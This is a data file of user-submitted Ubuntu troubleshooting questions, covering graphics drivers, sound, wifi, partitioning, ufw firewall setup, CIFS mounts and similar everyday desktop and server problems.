407210	( urgent ) hybrid graphics : amd card faulty , need to use intel card only	edit : using vgaswitcheroo is not possible because it 's accessible only if the radeon module loads . but my whole problem is that the radeon card does n't load , if ubuntu tries to load it , it hangs . [ ubuntu 13.04 ] my hp dv6 6121tx 's amd card has developed some kind of strange hardware fault . so i 'm running running windows with only the intel drivers , and the amd card disabled . it runs well enough , i 'm not having any issues ( except of course i ca n't run high res games , but that 's not a problem ) . now i really need a working ubuntu installation on my computer , but i can not figure out how to achieve the same with it . right after i install ubuntu ( no modifications ) , and i boot it , i get this screen . if i use 'nomodeset ' in the boot options , ubuntu boots up properly , but in 'software rendering mode ' . i 've tried various other boot options including : i915.modeset=0 i915.i915_enable_rc6=1 video=1366x768-24 @ 60 video=vga-1:1366x768-24 @ 60 can you guys guide me on how to disable/ignore/blacklist/uninstall the amd card from ubuntu and use intel graphics only in ubuntu ; like i 'm using in windows ? there 's no option in my bios to disable the amd card . ( i 've marked it as urgent because being a computer science student , most of my coursework is linux based ) thanks a lot guys , i 'll really appreciate if you guys can help me solve this huge headache .
407211	squid error on bind9 start	i 'm getting the following error after a bind9 update when i restart bind9 on my 12.04 lts server : root @ server2 : /etc/bind # service bind9 restart * stopping domain name service ... bind9 status : unknown job : squid waiting for pid 14728 to die [ ok ] * starting domain name service ... bind9 status : unknown job : squid i 've have n't noticed this before . i have squid3 and named running on the server without any issues that i can see . bind seems to be trying to invoke squid ? does anyone have any idea what might be causing this ? thanks , tony
407213	libre office showing strange characters	i am using ubuntu 12.04 . in my system i have libre office installed . i do n't use libre office so frequently . i had used it around 20-25 days before , at that time it was okay . but when i used that to make one document i saw there are some strange characters are showing after every paragraph and after every words it is showing one dot . for better understand i have uploaded the screenshot . there you can see the strange characters with dots . so can someone kindly tell me how to solve this issue . i have tried to on off the libre office many times and my system restart but its not working . the image can be seen here .
407215	how to update an ubuntu server without having to reboot ?	i am running a website using ubuntu server 12.04 . how can i update my server avoiding a reboot ( after the updates ) ? i did apt-get update and then apt-get upgrade ; but then it asks to reboot each time . is there a way to avoid rebooting ?
407217	how can i see my system details in a graphical way ? ( in lubuntu )	i am new to lubuntu . in windows , if i want to know my system properties , i see it by going to control panel and clicking on the system icon . what are the equivalents of these features in lubuntu , where a user can see his system properties and hardware configuration , like ram , cpu/processor , hard disk capacity , etc . ?
407218	usb wifi adapter sometimes does not wake on wake from suspend ?	actually i have 2 wifi adapters plugged to usb port all the time : one for internet ( dlink ) , the other one for wireless keyboard/mouse ( logitech ) . dlink one sometimes , when i wake up from suspend , does not get awaken . i have to unplug then plug back to wake it . the same does not happen with logitech wifi adapter for the keyboard/mouse set . does anyone know if this can be solved ? i do n't know what to search for as i have no clue what 's causing the error .
407219	how to change i686 to x86_64 linux system ?	i need to have a x86_64 system to compile a source code but my ubuntu is i686 . how can i have a 64 bit environment ?
407221	unable to manual login after upgrading ubuntu	i have upgraded my ubuntu from 13.04 to 13.10 . and now after the system restart ; there are only two options appears on screen as guest session and remote login . how can i get back the manual login option in my login screen ?
407223	wubildr.mbr missing or corrupt error while installing ubuntu using wubi in windows 8	i have installed ubuntu to my external drive using wubi , but , when i choose to run ubuntu , it says that \ubuntu\winboot\wubildr.mbr is either missing or corrupt . i am currently attempting to do a disk check on my external drive , which is d : . i am not sure if it will work , but i am going to try anyway . edit : it is 3 am cdt saturday january 18th , 2014 . i have checked the disk , and no errors were found . edit # 2 : i have tried to do a boot-repair , but that did n't work . i now submit my boot info my boot info
407225	sound is not working in ubuntu 13.04	i am having great trouble with sound in ubuntu 13.04. it was working fine but suddenly it stopped . i checked its sound settings , speaker test is not working ( front right and front left ) . i cant get it not even while login or logout and also i have checked alsamixer on terminal its shortcuts f6 f2 f3 not working . i am new to ubuntu pls help me out nd when i type lspci it displays this info . in context of audio 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) pls tell me what to do to get my sound back
407236	kazam video recoder software low sound problem ?	i am trying to record my screen as i speak while recording to make some tutorial video on my ubuntu laptop . the problem i am facing is that the voice quality is very low in recording and then i tried to use a external usb . microphone with it thinking that my internal microphone in laptop might not be as good quality as of the external one ( logitech usb microphone ) . after connecting the external microphone through usb i can see the external microphone in sound settings of ubuntu but in kazam preferences i can see only 1 internal microphone which is confusing ? so can anyone help me to get the volume of my recorded video higher ? how to get the volume of my recorded video high ? right now it records fine but only thing that is loud is the keystrokes as its internal microphone and my voice is very low . i tried increasing input volume of microphone to unamplified 100 % in sound settings ( input ) but all it does is makes video with a lot of noise instead of increasing the volume .
407237	triple boot ubuntu 13.10 with windows 7 and kali linux	i have windows 7 installed initially and then i installed kali linux using grub bootloader in my system . i want to triple boot these with ubuntu 13.10 . how do i do this ? any help with be appreciated . thanks .
407242	keryx - installing applications from hard drive	how can i use keryx to download applications not found in synaptic repositories or which i have on my hard drive ? keryx v0.92.4 ( portable ) , ubuntu 10.04
407244	installing dongle drivers to ubuntu 12.04	i have a micromax 3g dongle which came with windows , mac installation drivers . i am currently running ubuntu 12.04 . how should i make that dongle accessible in ubuntu or is there any generic software that can be used to access it ?
407247	how to rollback kernel upgrade ?	i use 12.04 . i upgraded kernel ( 3.8 . * ) to 3.12 . after restart nothing did not work . also does not appear . what should i do
407248	how to recover deleted partition whiile ubuntu installation , created under windows 8 with bitlocker	i was installing ubuntu , and i choose replace fedora . but after installation i have seen that my partition got deleted . there was 2 partition one was normal with data other partition was locked with bitlocker . how get it back ?
407249	how set command in background , close terminal and get it back to fg ?	i 'm trying to find out how to run a command in the background and then bring it to the foreground later . i 'm fed up of tutorials and answers where people state that it 's simple , just append & to the end of the command to get it run in the background . it 's working only within a single terminal window . i want to put the command into the background in one terminal and get it back to foreground after reopening the terminal example : $ grunt & $ jobs $ [ 1 ] + running grunt & of course after closing terminal no one job is found . next example : $ grunt & disown # the same behavior has : $ setsid grunt & $ jobs $ [ nothing ] # but ps shows that grunt is working after close terminal , grunt does n't work what did i do wrong ? could anybody explain me how to run the command in the background and get it back to foreground .
407251	skype and problem with terminal	recently , i have installed ubuntu 13.04 , and updated it . i want to install skype . i search in `` ubuntu software center '' but i did not find anything . therefore , i search on internet . i found out some commands for skype installation . then , i open the terminal and type the command . it request for password . the problem is that when i want to enter my password , my keyboard did not work and i can not type my password . how can i fix that ? thanks
407255	reorganize partitions with hdd and ssd	in my notebook i have a 16gb ssd and 1tb hdd . i have installed w7 an the hdd ~250gb . then i have installed ubuntu 12.04 . the / i put on the ssd with ~12gb and also the swap with the rest of ~4gb . the /home i put on the hdd with the rest of ~750gb . unfortunately i have just yet recognized that when installing programs this is done on the ssd and i might run out of space pretty quick . how can i reorganize the partitions properly ? thanks for the help ! here the output for df -h : filesystem size used avail use % mounted on /dev/sdb2 11g 5.8g 4.6g 56 % / udev 1.8g 12k 1.8g 1 % /dev tmpfs 724m 992k 723m 1 % /run none 5.0m 8.0k 5.0m 1 % /run/lock none 1.8g 260k 1.8g 1 % /run/shm /dev/sda3 686g 592m 650g 1 % /home fdisk -l disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00098003 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 493501558 246647355+ 7 hpfs/ntfs/exfat /dev/sda3 493502464 1953523711 730010624 83 linux disk /dev/sdb : 16.0 gb , 16013942784 bytes 255 heads , 63 sectors/track , 1946 cylinders , total 31277232 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x38b890f8 device boot start end blocks id system /dev/sdb1 2048 7813119 3905536 82 linux swap / solaris /dev/sdb2 7813120 31275007 11730944 83 linux disk /dev/mapper/cryptswap1 : 3999 mb , 3999268864 bytes 255 heads , 63 sectors/track , 486 cylinders , total 7811072 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x376be72b disk /dev/mapper/cryptswap1 does n't contain a valid partition table
407257	a right path to cpp sdk for using it in intellij idea 's cpp-project	i ca n't find the right path to cpp sdk which is required by intellij idea , ide i want to use for development a c++ project . could someone show me the right place ? screenshot here http : //i39.tinypic.com/2eg91ee.png
407261	achive error in wubi.exe when trying to install ubuntu12.04.3	i get this message when trying to install ubuntu 12.04.3 i can not find any specific references to this problem amongst all the problems that there seem to be with downloading and installing 12.04.3 ! is ubuntu only for computer mechanics or can ordinary folk dare to try take it out on the road without really knowing how it works ? many thanks if you have any ideas ... .offthemap archive : /home/peter/desktop/ubuntu-12.04.3-desktop-amd64/wubi.exe [ /home/peter/desktop/ubuntu-12.04.3-desktop-amd64/wubi.exe ] end-of-central-directory signature not found . either this file is not a zipfile , or it constitutes one disk of a multi-part archive . in the latter case the central directory and zipfile comment will be found on the last disk ( s ) of this archive . zipinfo : can not find zipfile directory in one of /home/peter/desktop/ubuntu-12.04.3-desktop-amd64/wubi.exe or /home/peter/desktop/ubuntu-12.04.3-desktop-amd64/wubi.exe.zip , and can not find /home/peter/desktop/ubuntu-12.04.3-desktop-amd64/wubi.exe.zip , period .
407265	sd card not recognized as bootable	i went to the bios of my asus s550 cm , switched on csm . i have a light weight version of linux copied to a 16 gb sd card . no where in the bios the sd card is recognized as a bootable device . how can i make the bios recognize the sd card as bootable . is there any requirements for a disk to be recognized as bootable . i have the dvd rom appearing there even when its empty or there is no botable disk in there .
407270	i ca n't install a .sh file	i ca n't install a .sh file . when i double click the file then it is open with archive manager not get any run or run in terminal option . i also checked the permission on allow executing file as program
407271	ubuntu 13.10 on acer extensa 5230 run only if apci=off	i 've installed ubuntu 13.10 dual boot with windows 7 on my acer extensa 5230 , so far the only ( big ) problem is that it does n't recognize the battery and wont shut down properly ( it hang on shutdown but reboot fine ) , i 've searched a fix for this but could n't figure out anything . ubuntu seems to only boot whit apci=off , already tried apci=ht command but does n't work . any idea ?
407273	no wireless with intel wireless-n 7260	no wireless with intel wireless-n 7260 . this is a new laptop bought without os . 12.04 is the first and only os installed . i tried manually replacing a .ucode driver from intell which i found here : http : //www.intel.com/support/wireless/wlan/sb/cs-034398.html . do i need to upgrade my kernel to 3.10 or 3.13 to be able to use these .ucode drivers ? what are the downsides of upgrading from 3.8 to 3.10 ? or are there other ways to fix my wireless ? thnx a million and here is some usefull output . uname -a linux maxbaeten 3.8.0-35-generic # 50~precise1-ubuntu smp wed dec 4 17:25:51 utc 2013 x86_64 x86_64 x86_64 gnu/linux lspci 00:00.0 host bridge : intel corporation xeon e3-1200 v3/4th gen core processor dram controller ( rev 06 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v3/4th gen core processor pci express x16 controller ( rev 06 ) 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) 00:03.0 audio device : intel corporation xeon e3-1200 v3/4th gen core processor hd audio controller ( rev 06 ) 00:14.0 usb controller : intel corporation 8 series/c220 series chipset family usb xhci ( rev 05 ) 00:16.0 communication controller : intel corporation 8 series/c220 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 8 series/c220 series chipset high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 1 ( rev d5 ) 00:1c.2 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 3 ( rev d5 ) 00:1c.3 pci bridge : intel corporation 8 series/c220 series chipset family pci express root port # 4 ( rev d5 ) 00:1d.0 usb controller : intel corporation 8 series/c220 series chipset family usb ehci # 1 ( rev 05 ) 00:1f.0 isa bridge : intel corporation hm86 express lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 8 series/c220 series chipset family 6-port sata controller 1 [ ahci mode ] ( rev 05 ) 00:1f.3 smbus : intel corporation 8 series/c220 series chipset family smbus controller ( rev 05 ) 03:00.0 network controller : intel corporation wireless 7260 ( rev 73 ) 04:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. device 5289 ( rev 01 ) 04:00.2 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 0a ) nmcli con list name uuid type timestamp-real wired connection 1 bbacdf7f-c148-405e-bf3b-7dfcb4267c5d 802-3-ethernet sat 18 jan 2014 01:08:30 pm cet sudo lshw -c network *-network unclaimed description : network controller product : wireless 7260 vendor : intel corporation physical id : 0 bus info : pci @ 0000:03:00.0 version : 73 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f7d00000-f7d01fff *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0.2 bus info : pci @ 0000:04:00.2 logical name : eth0 version : 0a serial : 00:90 : f5 : ee : df:96 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8411-1_0.0.3 06/18/12 ip=192.168.1.7 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:43 ioport : e000 ( size=256 ) memory : f0004000-f0004fff memory : f0000000-f0003fff rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no
407274	how exactly do files get opened from nautilus ?	i am asking this out of curiosity , to know what goes on 'behind the scenes ' when i double click a file in a file browser , say nautilus . specifically , what parameters is the executable executed with ? where does the .desktop file come into play , and how does nautilus send the filename ? this was relevant to me once when okular would open multiple instances of the same file , and i had to write a shell script , which used to fail because the filename did n't get passed properly . ( spaces in the filenames would get converted into an html % 20 character , and i had to figure out a lot how exactly filenames are passed . )
407275	why .xauthority needs not to be owned by the root account in order to get past login ?	i 've just got the same problem from here , and solved it using what was stated in the first answer ( akonsu 's one ) . however , i would love to know why ~/.xauthority needs not to be owned by the root account in order to get past login with a regular user ( in other words : why is that the reason for the login failure ) , and - do you have an assumption as to how akonsu found that as a solution ?
407278	why ca n't i install compiz-plugins-extra ?	i have installed ubuntu 13.10 , but i ca n't add compiz-plugins-extra , a collection of extra plugins from opencompositing for compiz . i tried running the command sudo apt-get install compizconfig-settings-manager compiz-plugins-extra , but it says the most recent version is already installed . does anybody know what should be done in such a case ?
407279	google hangouts plugin is not working as i want in chromium	am i the only one experiencing problems with the google hangouts plugin ? i did some changes so that i see the hangouts icon in the topbar . but it happens once and a while that i cant open the window . the only thing i can do in that case is close chromium and reopen it again . i have hangouts with multiple people in the same chat . so pidgin or empathy is not something what i can count as workaround . also when i closed the browser and want to reopen it i get the contact list of hangouts and not the browser itself . i have to open it by using right-click on the chromium shortcut .
407281	how to recover my system from a failed upgrade due connection lost ?	so the other day i wanted to upgrade ubuntu but my laptop lost internet connection half-way , and now ubuntu is only half-upgraded and i ca n't access anything anymore ... i ca n't reconnect to the internet as this function is not there anymore ( due to the half-upgrade i guess ) , and when trying to click on anything or search for anything nothing happens ... do i have to set it up again fully now ? and if so , how can i save all my data and stuff ?
407282	network starts slow on ubuntu 13.10 start or resume	i have this laptop ( thinkpad x1 carbon ) with windows 7 and ubuntu 13.10 dualboot . recently upgraded from ubuntu 12.10 . the good thing about this upgrade is that ubuntu 13.10 starts very fast compared to 12.10 . the bad thing is that my wifi network connection has problems . when i start ( or resume from hibernate , which is every time i open my laptop ) , ubuntu often has difficulties connecting to the internet . when i open new tabs , it can take up to a minute ( ! ) before the page actually starts to load . it can take ages for dropbox or skype to connect . sometimes i disconnect and reconnect to the wifi network to speed things up . it does n't always work . after a while , things start to go normally ( read : fast ) again . at the same time , windows 7 has no problems on this laptop . neither did ubuntu 12.10 . so it 's not a problem with my lan or my provider . there are a lot of questions and answers about this , and they are often old , predating 12.10 , so it does n't seem relevant as 13.10 introduced the problem for me . i 've read some of these old questions and they all seem irrelevant one way or the other ( e.g . slow all the time , network-manager not working , etc . i tried playing around with /etc/nsswitch.conf which is a popular remedy on google for many times in a row , e.g . : # hosts : files mdns4_minimal [ notfound=return ] dns mdns4 hosts : files dns mdns4_minimal [ notfound=return ] mdns4 ... but i do n't seem to get any improvements . either way , i do n't really know what it does , nor understand why such a popular fix is n't the default to begin with . any new 13.10 developments that i should know about in order to fix this ? $ lspci | grep -i net 03:00.0 network controller : intel corporation centrino advanced-n 6205 [ taylor peak ] ( rev 96 ) i ignored the ipv6 settings : i used namebench dns benchmarker that the 3 fastest dns servers for my location are ( in order of speed ) 8.8.8.8 74.82.42.42 8.8.4.4 and i 've entered them in additional dns addresses under network settings . however , two 195 . * also show up in the summary ( and i do n't know if that 's perfectly normal or where they come from ) : dns : 192.168.2.254 195.241.77.55 195.241.77.58 8.8.8.8 74.82.42.42 8.8.4.4 ( first one being my router of course . ) -update- example ping after resume from hibernate : $ ping www.facebook.com ping star.c10r.facebook.com ( 31.13.64.65 ) 56 ( 84 ) bytes of data . 64 bytes from edge-star-shv-06-ams2.facebook.com ( 31.13.64.65 ) : icmp_seq=1 ttl=91 time=12866 ms 64 bytes from edge-star-shv-06-ams2.facebook.com ( 31.13.64.65 ) : icmp_seq=2 ttl=91 time=11858 ms 64 bytes from edge-star-shv-06-ams2.facebook.com ( 31.13.64.65 ) : icmp_seq=3 ttl=91 time=14622 ms 64 bytes from edge-star-shv-06-ams2.facebook.com ( 31.13.64.65 ) : icmp_seq=4 ttl=91 time=13614 ms 64 bytes from edge-star-shv-06-ams2.facebook.com ( 31.13.64.65 ) : icmp_seq=5 ttl=91 time=12608 ms 64 bytes from edge-star-shv-06-ams2.facebook.com ( 31.13.64.65 ) : icmp_seq=6 ttl=91 time=11601 ms 64 bytes from edge-star-shv-06-ams2.facebook.com ( 31.13.64.65 ) : icmp_seq=7 ttl=91 time=10598 ms 64 bytes from edge-star-shv-06-ams2.facebook.com ( 31.13.64.65 ) : icmp_seq=8 ttl=91 time=9591 ms 64 bytes from edge-star-shv-06-ams2.facebook.com ( 31.13.64.65 ) : icmp_seq=9 ttl=91 time=8588 ms 64 bytes from edge-star-shv-06-ams2.facebook.com ( 31.13.64.65 ) : icmp_seq=10 ttl=91 time=7584 ms 64 bytes from edge-star-shv-06-ams2.facebook.com ( 31.13.64.65 ) : icmp_seq=11 ttl=91 time=6576 ms 64 bytes from edge-star-shv-06-ams2.facebook.com ( 31.13.64.65 ) : icmp_seq=12 ttl=91 time=5569 ms 64 bytes from edge-star-shv-06-ams2.facebook.com ( 31.13.64.65 ) : icmp_seq=13 ttl=91 time=4560 ms 64 bytes from edge-star-shv-06-ams2.facebook.com ( 31.13.64.65 ) : icmp_seq=14 ttl=91 time=29.1 ms ^c -- - star.c10r.facebook.com ping statistics -- - 14 packets transmitted , 14 received , 0 % packet loss , time 16956ms rtt min/avg/max/mdev = 29.124/9305.105/14622.563/3940.769 ms , pipe 13
407283	oracle 11g/or12c	can anyone tell me steps to install oracle 11g or 12c ( anyone ) on my ubuntu machine 13.10 . i tried so many times , googling is also not working in this case . thanks
407285	problem while installing gnome using terminal ?	i was trying to install gnome 3.10 in my ubuntu 13.10.. i entered the command : sudo add-apt-repository ppa : gnome3-team/gnome3-next & & sudo apt-get update then : sudo add-apt-repository ppa : gnome3-team/gnome3-next & & sudo apt-get update after some time when installation reached 60 % it showed : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? when i type apt-get update , it displays : e : could not open lock file /var/lib/apt/lists/lock - open ( 13 : permission denied ) e : unable to lock directory /var/lib/apt/lists/ e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? and fix-missing : command not found what to do ?
407286	more disk read/write after decreasing swapiness	i know this may sound absurd but my laptop has xubuntu saucy with 4gb ram . i decreased swapiness from 60 to 7 but now applications take more time to launch and i see disk i/o before the application window appears . this is particularly the case for thunar and the terminal . before changing swapiness , the launch of such applications took no time . here are the lines in sysctl.conf : vm.swappiness=6 vm.vfs_cache_pressure=50
407287	change xfce4-power-manager option from terminal	i 'd like to change a xfce4-power-manager setting ( what to do when laptop lid is closed on ac ) via the terminal so that i can assign a keyboard shortcut to do it . is there a way how to do it ? similar to dconf-editor set for gnome.. edit ok , i found the file at ~/.config/xfce4/xfconf/xfce-perchannel-xml/xfce4-power-manager.xml . but changing it does n't do anything . how do i reload xfce4-power-manager ? i tried xfce4-power-manager -- restart but that does n't help .
407289	what do these terminal signals mean ?	when i start to use a command to terminate an ongoing process , i can include a signal . what is the difference between the signal 9 and the signal 15 ?
407290	no audio input device on ubuntu 13.10 with front-mic plugged-in	i have sound but ca n't see any audio-input ( mic ) device in settings . the mic works , i have tested using gnome-alsamixer by redirecting the mic to output . but when i try the sound recorder it says `` your audio capture settings are incorrect '' . also google-talk plugin says i have mic problems . **** list of capture hardware devices **** card 0 : nvidia [ hda nvidia ] , device 0 : alc883 analog [ alc883 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : nvidia [ hda nvidia ] , device 2 : alc883 alt analog [ alc883 alt analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 updates the rear mic is detected , and works , the problem remains with the front-mic . i also use front and back plugs at the same time , and it seems to be a detection problem , the front speakers work ( at the same time and channel with rear ) , just the front-mic does n't . can the mic be set to be always on ?
407293	how to configure ufw to really allow outgoing connections	i have hard time to understand how ufw should be configured . the problem is that i allowed outgoing traffic , and still i can not do virtually anything . i 'm using ubuntu 12.04 on vps . ufw -- version ufw 0.31.1-1 copyright 2008-2010 canonical ltd. ===================== ufw enable error : problem running ufw-init however it is running , despite of : service ufw status ufw stop/waiting ===================== ufw status verbose status : active logging : on ( high ) default : deny ( incoming ) , allow ( outgoing ) new profiles : skip to action from -- -- -- -- -- -- 22 allow in anywhere 80 allow in anywhere 53 allow in anywhere 22 allow in anywhere ( v6 ) 80 allow in anywhere ( v6 ) 53 allow in anywhere ( v6 ) ===================== curl google.com curl : ( 6 ) could n't resolve host 'google.com' ===================== /sbin/iptables-save # generated by iptables-save v1.4.12 on sat jan 18 14:29:14 2014 *nat : prerouting accept [ 2040:126555 ] : postrouting accept [ 9030:565559 ] : output accept [ 9030:565559 ] commit # completed on sat jan 18 14:29:14 2014 # generated by iptables-save v1.4.12 on sat jan 18 14:29:14 2014 *mangle : prerouting accept [ 82335:15158279 ] : input accept [ 82335:15158279 ] : forward accept [ 0:0 ] : output accept [ 72552:19020407 ] : postrouting accept [ 72552:19020407 ] commit # completed on sat jan 18 14:29:14 2014 # generated by iptables-save v1.4.12 on sat jan 18 14:29:14 2014 *filter : input drop [ 16:2528 ] : forward drop [ 0:0 ] : output accept [ 98:10744 ] : ufw-after-forward - [ 0:0 ] : ufw-after-input - [ 0:0 ] : ufw-after-logging-forward - [ 0:0 ] : ufw-after-logging-input - [ 0:0 ] : ufw-after-logging-output - [ 0:0 ] : ufw-after-output - [ 0:0 ] : ufw-before-forward - [ 0:0 ] : ufw-before-input - [ 0:0 ] : ufw-before-logging-forward - [ 0:0 ] : ufw-before-logging-input - [ 0:0 ] : ufw-before-logging-output - [ 0:0 ] : ufw-before-output - [ 0:0 ] : ufw-logging-allow - [ 0:0 ] : ufw-logging-deny - [ 0:0 ] : ufw-reject-forward - [ 0:0 ] : ufw-reject-input - [ 0:0 ] : ufw-reject-output - [ 0:0 ] : ufw-skip-to-policy-forward - [ 0:0 ] : ufw-skip-to-policy-input - [ 0:0 ] : ufw-skip-to-policy-output - [ 0:0 ] : ufw-track-input - [ 0:0 ] : ufw-track-output - [ 0:0 ] : ufw-user-forward - [ 0:0 ] : ufw-user-input - [ 0:0 ] : ufw-user-limit - [ 0:0 ] : ufw-user-limit-accept - [ 0:0 ] : ufw-user-logging-forward - [ 0:0 ] : ufw-user-logging-input - [ 0:0 ] : ufw-user-logging-output - [ 0:0 ] : ufw-user-output - [ 0:0 ] -a input -j ufw-before-logging-input -a input -j ufw-before-input -a input -j ufw-after-input -a input -j ufw-after-logging-input -a input -j ufw-reject-input -a input -j ufw-track-input -a forward -j ufw-before-logging-forward -a forward -j ufw-before-forward -a forward -j ufw-after-forward -a forward -j ufw-after-logging-forward -a forward -j ufw-reject-forward -a output -j ufw-before-logging-output -a output -j ufw-before-output -a output -j ufw-after-output -a output -j ufw-after-logging-output -a output -j ufw-reject-output -a output -j ufw-track-output -a ufw-after-logging-forward -m limit -- limit 3/min -- limit-burst 10 -j log -- log-prefix `` [ ufw block ] `` -a ufw-after-logging-input -m limit -- limit 3/min -- limit-burst 10 -j log -- log-prefix `` [ ufw block ] `` -a ufw-before-forward -j ufw-user-forward -a ufw-before-input -j ufw-user-input -a ufw-before-output -j ufw-user-output -a ufw-logging-allow -m limit -- limit 3/min -- limit-burst 10 -j log -- log-prefix `` [ ufw allow ] `` -a ufw-logging-deny -m state -- state invalid -m limit -- limit 3/min -- limit-burst 10 -j return -a ufw-logging-deny -m limit -- limit 3/min -- limit-burst 10 -j log -- log-prefix `` [ ufw block ] `` -a ufw-skip-to-policy-forward -j drop -a ufw-skip-to-policy-input -j drop -a ufw-skip-to-policy-output -j accept -a ufw-track-output -p tcp -m state -- state new -j accept -a ufw-track-output -p udp -m state -- state new -j accept -a ufw-user-input -p tcp -m tcp -- dport 22 -j accept -a ufw-user-input -p udp -m udp -- dport 22 -j accept -a ufw-user-input -p tcp -m tcp -- dport 80 -j accept -a ufw-user-input -p udp -m udp -- dport 80 -j accept -a ufw-user-input -p tcp -m tcp -- dport 53 -j accept -a ufw-user-input -p udp -m udp -- dport 53 -j accept -a ufw-user-limit -m limit -- limit 3/min -j log -- log-prefix `` [ ufw limit block ] `` -a ufw-user-limit -j reject -- reject-with icmp-port-unreachable -a ufw-user-limit-accept -j accept commit # completed on sat jan 18 14:29:14 2014 ===================== /var/log/ufw.log is always empty . i 'm totally clueless on how to make wget , apt-get , curl etc . work with ufw , what am i missing ?
407295	terminal prompt changed after update	i am newbie , using ubuntu v 13.10 and after automatic update , when i started terminal instead of coming : naveen @ navyad $ it is coming like ~ ( tilde in red color ) naveen @ naveen-lenovo-g580 $ ( in blue color ) on ls all directories coming blue colors ( earlier white ) can someone help to sort it out . updated when directory is traversed like : naveen @ naveen-lenovo-g580 $ cd temp is coming like ~/tmp naveen @ naveen-lenovo-g580 $
407297	wubi-installed 12.04 / 'low graphics mode ' / 'loading extension glx ' freezes ?	i 've been using ubuntu 12.04 installed via wubi on my windows 7 laptop for a couple of months now . last weekend i installed spotify and pycharm ( which required me to download a java library ) and since then i ca n't boot up . when i try i get an error message saying 'the system is running in low graphics mode ' and the screen freezes . having googled it ( on my phone ) i found this thread that discusses it how to fix `` the system is running in low-graphics mode '' error ? ( it appears to be an issue with the graphics driver ) the second issue is when i follow the instructions in the answer above and try to boot via failsafex on the recovery menu i get as far as 'loading extension glx ' and the screen freezes again . googling that problem led me here loading extension glx : screen freezes but it 's not clear to me how i 'm supposed to run commands when the failsafex process is failing ? i 'm relatively new to ubuntu/linux and while everything i 've worked on within my installation has been backed up , i 'm loathed to have to uninstall the wubi installation and start again . equally , i do n't want to start trying things without understanding what i 'm doing and potentially making it worse . any help on this would be much appreciated !
407300	i currently installed gromacs 4.6.5 and everytime i open new terminal i need to source	everytime i open new terminal to use gromacs i need to source /usr/local/gromacs/bin/gmxrc before it works . what should i do to fix this ? thanks ! i 'm using ubuntu 13.10 and i installed gromacs 4.6.5
407301	run tmux not byobu	i 've been using tmux for a number of years , earlier today i thought i 'd try byobu - to see what it 's like . but now i ca n't get back to tmux . when i run tmux i end up back in boyobu . does anyone know what 's going on ?
407304	skype soundevices all of a sudden missing . only pulse audio available !	i 've been using my ubuntu 13.10 for some 7 days now and am pretty unhappy with it . i used it in the past and id proved much more stable . programs are often crashing and this last thing with skype really got me annoyed . i have logitech g930 and until yesterday night skype recognized it without issues among available devices . along with it , there were a bunch of other options . last night , with no obvious reason to me , there is only one option : pulse audio . sound is terrible of course . now , i do take these phones out every now and then . since they do n't have 'safely remove hardware ' option , i 'm guessing this could stir things up a bit . any ideas what could be going on ? i think i installed wine last night - could it somehow mess things up ? p.s . outside of skype , my headphones are working perfectly . thanks
407309	ubuntu desktop unable to mount share	i 've got a new installation of ubuntu running as a vm on server 2012 . i 've joined it to the domain using likewise open . i am able to us domain accounts to logon to the ubuntu desktop . i am having a problem mounting or connecting to the windows server however . i 've tried using `` connect to server '' to get to the share but i get an error `` please verify your credentials '' . i 've tried manually mounting the share using cifs , similar error `` mount error ( 13 ) permission denied '' i 've used the same credentials i used to log in as well as the administrator credentials to mount this share . i have an installation of ubuntu server which was able to mount the share without a problem , using the same methods . the only difference is the server is not joined to the domain . i can ping the server and the domain . the entry in fstab looks like this : //server-1/music /mnt/music cifs credentials=/root/.smbcredentials , iocharset=utf8 , file_mode=0777 , dir_mode=0777 0 0 does anyone have any ideas on this ?
407310	show all network entities that are in range	on ubuntu , what program could i use to show all network entities that any of my network cards can communicate with within the network , i see what is communicating with what , including what things are communicating with things outside the network . it should show it as a graphical interactive map . i am trying zenmap right now , but it only has localhost and the target , completely ignoring my other network cards .
